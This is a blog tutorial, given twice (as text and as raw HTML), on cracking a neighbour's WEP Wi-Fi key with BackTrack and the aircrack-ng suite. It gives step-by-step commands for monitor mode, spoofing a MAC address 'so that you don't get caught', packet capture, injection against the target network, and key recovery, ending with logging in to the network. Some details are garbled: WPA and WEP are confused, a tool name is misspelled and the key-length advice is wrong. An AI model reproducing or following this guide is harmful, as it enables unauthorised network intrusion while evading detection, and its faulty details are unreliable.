Hacking Wifi Network Using BackTrack

Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections (as if you didnt know..),Wifi has become an integral part of our lives today. Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s by encrypting data over radio waves,however, it has been found that WEP is not as secure as once believed.Now almost anyone can hack into a Wifi network by generating the valid WEP key using Bactrack. Read on to learn how..
Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information; the blogger cannot be held liable.

GETTING BACKTRACK

BackTrack is a slax based top rated Linux live distribution focused on penetration testing which consists of more than 300 up to date tools along with the ability of customizing scripts, configuring and modding kernels which makes it a true gem and a must have for every security enthusiastic out there. The best part – Its free and you can download it from – Remote Exploit

SETTING UP THE CARD AND THE CONSOLE

Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -

1	`ifconfig`

This is the Linux equivalent of ipconfig, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.

1	`airmon-ng`

This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range.

1	`airmon-ng stop [Wi-Fi Card name(without the quotes)]`

This command will stop the cards broadcast and reception immediately

1	`macchanger –mac [Desired MAC address] [Wi-Fi card name]`

This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later

1	`airmon-ng start [Wi-Fi Card name]`

You will see another extra adaptor that is set on monitor mode, use that adaptor for all further purposes in the following commands where – “[Wi-Fi card name]” appears

DUMPING PACKETS

Once you have set up all the parameters, you need to sniff and dump data packets in order to get the key. You can do so by using following commands. On the command console type these commands -

1	`airodump-ng [Wi-Fi card name]`

Copy and paste the BSSID in the following command and execute it

1	`airodump-ng –c [Channel Number] –w [Desired Filename` `for` `later decryption] --bssid [BSSID] [Wi-Fi Card name]`

As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.

SPEEDING UP THINGS

However packet dumping is quite a slow process, we need to speed up things to save our time. Open new console after the first data packet has been stored and type the command in the new console and execute it.

1	`airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]`

As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.

REVEALING WEP KEY

Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.

1	`aircrack-ng –n 64 –b [BSSID] [Filename without the extension]`

As you type this command, you will see that a key will appear in front of you in the given below format:
XX:XX:XX:XX
It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:

1	`aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]`

Remember, the bit level should be a number of 2n where n:1,2,3,4…
e.g.

aircrack-ng –n 32 –b [BSSID] [Filename without the extension]
OR
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.

Now just login using the WEP key you got.
Cheers..

Read more: DragonHackers Blogspot | Tutorial Blogger | Tutorial Internet | Tutorial Computer http://dragonhackthis.blogspot.com/ Under Creative Commons License: Attribution

<ins style="border: medium none; display: inline-table; height: 60px; margin: 0pt; padding: 0pt; position: relative; visibility: visible; width: 468px;"><ins id="aswift_2_anchor" style="border: medium none; display: block; height: 60px; margin: 0pt; padding: 0pt; position: relative; visibility: visible; width: 468px;"></ins></ins>               <br />
<img alt="wifi-hacked" class="alignright size-full wp-image-1979" height="177" src="http://img.viralpatel.net/2010/01/wifi-hacked.png" title="wifi-hacked" width="158" />Wifi  or Wireless Fidelity is the name of a popular wireless networking  technology that uses radio waves to provide wireless high-speed Internet  and network connections (as if you didnt know..),Wifi has become an  integral part of our lives today. Wifi is secured using a WPA protocol  which intends to secure Wireless LANs like Wired LAN’s by encrypting  data over radio waves,however, it has been found that WEP is not as  secure as once believed.Now almost anyone can hack into a Wifi network  by generating the valid WEP key using Bactrack. Read on to learn how..<br />
<i><b>Disclaimer:</b> This tutorial is given for  educational purposes only and that for any misuse of this information;  the blogger cannot be held liable.</i><br />
<br />
<br />
<a name='more'></a><br />
<br />
<h2>GETTING BACKTRACK</h2>BackTrack is a slax based top rated Linux live distribution focused  on penetration testing which consists of more than 300 up to date tools  along with the ability of customizing scripts, configuring and modding  kernels which makes it a true gem and a must have for every security  enthusiastic out there. The best part – Its free and you can download it  from – <a href="http://www.remote-exploit.org/backtrack_download.html" rel="nofollow" target="_blank"><b>Remote Exploit</b></a><br />
<h2>SETTING UP THE CARD AND THE CONSOLE</h2>Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -<br />
<div><div class="syntaxhighlighter  bash" id="highlighter_64082"><div class="toolbar"><a class="toolbar_item command_help help" href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="bash functions">ifconfig</code></div></div></td></tr>
</tbody></table></div></div>This is the Linux equivalent of <code>ipconfig</code>, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.<br />
<div><div class="syntaxhighlighter  bash" id="highlighter_261333"><div class="toolbar"><a class="toolbar_item command_help help" href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="bash plain">airmon-ng</code></div></div></td></tr>
</tbody></table></div></div>This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range.<br />
<div><div class="syntaxhighlighter  bash" id="highlighter_112614"><div class="toolbar"><a class="toolbar_item command_help help" href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="bash plain">airmon-ng stop [Wi-Fi Card name(without the quotes)]</code></div></div></td></tr>
</tbody></table></div></div>This command will stop the cards broadcast and reception immediately<br />
<div><div class="syntaxhighlighter  bash" id="highlighter_659937"><div class="toolbar"><a class="toolbar_item command_help help" href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="bash plain">macchanger –mac [Desired MAC address] [Wi-Fi card name]</code></div></div></td></tr>
</tbody></table></div></div>This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later<br />
<div><div class="syntaxhighlighter  bash" id="highlighter_923021"><div class="toolbar"><a class="toolbar_item command_help help" href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="bash plain">airmon-ng start [Wi-Fi Card name]</code></div></div></td></tr>
</tbody></table></div></div>You will see another extra adaptor that is set on monitor mode, use  that adaptor for all further purposes in the following commands where –  “[Wi-Fi card name]” appears<br />
<h2>DUMPING PACKETS</h2>Once you have set up all the parameters, you need to sniff and dump  data packets in order to get the key. You can do so by using following  commands. On the command console type these commands -<br />
<div><div class="syntaxhighlighter  bash" id="highlighter_674428"><div class="toolbar"><a class="toolbar_item command_help help" href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="bash plain">airodump-ng [Wi-Fi card name]</code></div></div></td></tr>
</tbody></table></div></div>Copy and paste the BSSID in the following command and execute it<br />
<div><div class="syntaxhighlighter  bash" id="highlighter_954562"><div class="toolbar"><a class="toolbar_item command_help help" href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="bash plain">airodump-ng –c [Channel Number] –w [Desired Filename </code><code class="bash keyword">for</code> <code class="bash plain">later decryption] --bssid [BSSID] [Wi-Fi Card name]</code></div></div></td></tr>
</tbody></table></div></div>As you execute the command, you will see a certain number of beacons  and data packets that will be stored in the filename you have given. The  file will be stored in the root of the system drive (Click on Computer  and you will see the file).The file will be present in two formats:  *.cap, *.txt.<br />
<h2>SPEEDING UP THINGS</h2>However packet dumping is quite a slow process, we need to speed up  things to save our time. Open new console after the first data packet  has been stored and type the command in the new console and execute it.<br />
<div><div class="syntaxhighlighter  bash" id="highlighter_890144"><div class="toolbar"><a class="toolbar_item command_help help" href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="bash plain">airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]</code></div></div></td></tr>
</tbody></table></div></div>As you type this command you will see that the data packets required  for breaking the key will increase dramatically thereby saving you a lot  of time.<br />
<h2>REVEALING WEP KEY</h2>Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.<br />
<div><div class="syntaxhighlighter  bash" id="highlighter_478236"><div class="toolbar"><a class="toolbar_item command_help help" href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="bash plain">aircrack-ng –n 64 –b [BSSID] [Filename without the extension]</code></div></div></td></tr>
</tbody></table></div></div><img alt="wep-wifi-hacked" class="alignright size-full wp-image-1980" height="126" src="http://img.viralpatel.net/2010/01/wep-wifi-hacked.png" title="wep-wifi-hacked" width="122" />As you type this command, you will see that a key will appear in front of you in the given below format:<br />
<b>XX:XX:XX:XX</b><br />
It is not necessary that the key should have exactly the same digits  as shown above so please don’t freak out if you see a 10 digit or 14  digit key. Also if the decryption fails, you can change the bit level of  the decryption in the command:<br />
<div><div class="syntaxhighlighter  bash" id="highlighter_960765"><div class="toolbar"><a class="toolbar_item command_help help" href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="bash plain">aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]</code></div></div></td></tr>
</tbody></table></div></div>Remember, the bit level should be a number of 2n where n:1,2,3,4…<br />
e.g. <br />
<div><div class="syntaxhighlighter  bash" id="highlighter_871678"><div class="toolbar"><a class="toolbar_item command_help help" href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div><div class="line number2 index1 alt1">2</div><div class="line number3 index2 alt2">3</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="bash plain">aircrack-ng –n 32 –b [BSSID] [Filename without the extension]</code></div><div class="line number2 index1 alt1"><code class="bash plain">OR</code></div><div class="line number3 index2 alt2"><code class="bash plain">aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.</code></div></div></td></tr>
</tbody></table></div></div>Now just login using the WEP key you got.<br />
<i>Cheers..</i>
<br/> Sumber:
<a href='http://dragonhackthis.blogspot.com/2011/06/hacking-wifi-network-using-backtrack.html'>
Dragon Hack
</a>